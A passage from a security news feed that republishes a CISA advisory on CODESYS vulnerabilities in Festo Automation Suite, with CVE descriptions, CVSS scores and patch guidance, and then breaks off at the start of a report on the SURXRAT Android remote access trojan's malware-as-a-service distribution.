<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/754.html">CWE-754 Improper Check for Unusual or Exceptional Conditions</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-0694</a></h3>
<div class="csaf-accordion-content">
<p>Insufficient path validation in CODESYS Control allows low privileged attackers with physical access to gain full filesystem access.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-0694">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/22.html">CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.6</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-1468</a></h3>
<div class="csaf-accordion-content">
<p>An unauthenticated remote attacker can gain access to sensitive information including authentication information when using CODESYS OPC UA Server with the non-default Basic128Rsa15 security policy.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-1468">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/203.html">CWE-203 Observable Discrepancy</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-41658</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS Runtime Toolkit-based products may expose sensitive files to local low-privileged operating system users due to default file permissions.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-41658">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/276.html">CWE-276 Incorrect Default Permissions</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-41659</a></h3>
<div class="csaf-accordion-content">
<p>A low-privileged attacker can remotely access the PKI folder of the CODESYS Control runtime system and thus read and write certificates and its keys. This allows sensitive data to be extracted or to accept certificates as trusted. Although all services remain available, only unencrypted communication is possible if the certificates are deleted.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-41659">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/732.html">CWE-732 Incorrect Permission Assignment for Critical Resource</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.3</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2020-11023</a></h3>
<div class="csaf-accordion-content">
<p>In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing option elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2020-11023">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/79.html">CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N">CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47382</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47382">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>CERT@VDE reported this vulnerability to Festo</li>
</ul>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:</p>
<p>Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolating them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.</p>
<p>Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<p>CISA also recommends users take the following measures to protect themselves from social engineering attacks:</p>
<p>Do not click web links or open attachments in unsolicited email messages.</p>
<p>Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.</p>
<p>Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.</p>
<p>No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.</p>
<hr>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-03-17</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-03-17</td>
<td>1</td>
<td>Initial Republication of Festo SE &amp; Co. KG FSA-202601</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[SURXRAT: From ArsinkRAT roots to LLM Module Downloads Signaling Capability Expansion]]></title>
<description><![CDATA[Executive Summary




SURXRAT is an actively developed Android Remote Access Trojan (RAT) commercially distributed through a Telegram-based malware-as-a-service (MaaS) ecosystem under the SURXRAT V5 branding.


The malware is marketed using structured reseller and partner licensing tiers, allowin...]]></description>
<link>https://tsecurity.de/de/3347470/it-security-nachrichten/surxrat-from-arsinkrat-roots-to-llm-module-downloads-signaling-capability-expansion/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3347470/it-security-nachrichten/surxrat-from-arsinkrat-roots-to-llm-module-downloads-signaling-capability-expansion/</guid>
<pubDate>Fri, 13 Mar 2026 15:22:13 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1200" height="600" src="https://cyble.com/wp-content/uploads/2026/02/Blog-image-34-1.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="SURXRAT" decoding="async" srcset="https://cyble.com/wp-content/uploads/2026/02/Blog-image-34-1.jpg 1200w, https://cyble.com/wp-content/uploads/2026/02/Blog-image-34-1-300x150.jpg 300w, https://cyble.com/wp-content/uploads/2026/02/Blog-image-34-1-1024x512.jpg 1024w, https://cyble.com/wp-content/uploads/2026/02/Blog-image-34-1-768x384.jpg 768w, https://cyble.com/wp-content/uploads/2026/02/Blog-image-34-1-600x300.jpg 600w" sizes="(max-width: 1200px) 100vw, 1200px" title="SURXRAT: From ArsinkRAT roots to LLM Module Downloads Signaling Capability Expansion 7"></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Executive Summary</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>SURXRAT is an actively developed Android Remote Access Trojan (RAT) commercially distributed through a Telegram-based malware-as-a-service (MaaS) ecosystem under the SURXRAT V5 branding.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The malware is marketed using structured reseller and partner licensing tiers, allowing affiliates to generate and distribute customized builds while the operator maintains centralized infrastructure and operational control.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This distribution model reflects the increasing professionalization of the Android threat landscape, where malware developers focus on scalability and monetization through affiliate-driven campaigns.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
